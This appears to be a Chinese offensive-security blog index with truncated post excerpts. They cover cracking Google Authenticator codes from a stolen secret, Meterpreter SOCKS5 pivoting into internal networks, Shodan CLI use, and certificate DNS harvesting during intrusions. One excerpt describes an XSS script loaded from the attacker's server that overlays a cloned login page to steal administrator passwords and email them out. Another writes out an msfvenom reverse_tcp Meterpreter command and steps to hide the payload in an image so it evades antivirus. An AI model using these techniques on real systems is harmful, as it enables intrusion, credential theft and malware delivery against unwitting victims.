谷歌身份验证器动态code破解

想要破解谷歌身份验证器的动态码,需要知道它生成的secret,一般这个值都是存放在数据库中的。至于怎么拿到secret这个值,这里不多缀述。 破解方法:保存下列PHP代码到为xxxx.php,之后修改其中的$secret变量为你获取到的值。即修改xxxxxxxxxxxxxxxx为16位secret值。之后运行 php xxxx.php 运行结果如下: PHP代码:

查看全部


msf6之内网代理

msf以前的代理方式已经官方提示,如果你这么使用提示就会出现 也就是说20201229号就会移除这个代理模块,进而使用新的代理模块支持socks5代理 今天说一下,在meterpreter里面设置代理方法,进入对应的sessions后,执行 接下来,退出当前的sessions ,即backgroud后,在msf6命令行界面输入 以上说明运行成功,之后通过proxychains设置socks5代理,直接访问目标内网即可。

查看全部


Mac下保存https网站的ssl证书和输出证书详细信息

如果网站是https网站,你想把证书导出来,windows下直接查看证书导出就可以了。mac下更方便,直接拖拽证书到桌面即可。如下操作: 那么渗透过程中需要查看该证书下所有对应的DNS记录,例如这样 Mac想导出有点麻烦。但是一个命令可以查看该证书的所有信息,并复制DNS信息保存。 输出DNS复制即可。如下:

查看全部


利用xss钓指定登陆页面账号密码并发送到邮箱

1.新建一个xss.js文件,内容如下,放在服务器里便于调用 将这段js以xss方式插入到目标里,即<script src=”你服务器/xss.js”></script>简单说一下代码,插入目标之后,会新建一个cookie值,如果不存在这个值,就会创建一个iframe,这个iframe引用伪造的登陆页面并覆盖当前的后台页面,这就让其url地址不改变,不会让目标产生怀疑。而且这样的xss通过cookie设置,只执行一次,除非删了cookie qad值,才会反复执行xss。代码中https://xxx.xxx.xxx/login/target_login.html 设置成你钓鱼页面html地址,钓鱼页面伪造就直接用目标的登陆页面右击源码,直接复制保存到自己的web服务器里作为target_login.html文件保存,并修改html中js,css等资源为目标 […]

查看全部


shodan会员版命令行详细使用说明

使用前奏:基于命令行的shodan会员版,首先需要拿到key(登录后账号信息里有),要不然会提示“Error: Please run “shodan init <api key>” before using this command”导入key: root:~$ shodan init T1N3uP0Lyeq5w0wxxxxxxxxxxxxxxx 如果未安装则需要安装shodan root:~$ pip install shodan //安装 root:~$ pip install -U shodan //后续升级 正式进入命令详细说明之前,先用娱乐一下: curl parrot.live //丧的时候对着会舞动的终端发发呆还是可以的 curl wttr.in //终端版天气显示,”宅”心仁厚久了,出门还是有必要看一眼的 1.显示自己公网IP root: […]

查看全部


使用图片携带msf payload反弹绕过各种AV

#使用说明 1.先找一个高清大图片,四位数*四位数 那种以上的jpg或者png高清大图,命名为1.jpg ,低于四位数的高清大图会失败,一般图片大小,大于1M小于2M即可 。 2.使用msfvenom生成一个powershell的反弹的payload,一定要用64位的,32位的弹不出来●msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f psh-reflection > 1.ps1 3.使用Invoke-PSImage.ps1 把powershell 反弹的payload 压缩进高清大图里。操作如下:打开cmd,并执行powershell,之后再顺序执行以下命令●Import-Module .\Invoke-PSImage.ps1●Invoke-PSImage -Scr […]

查看全部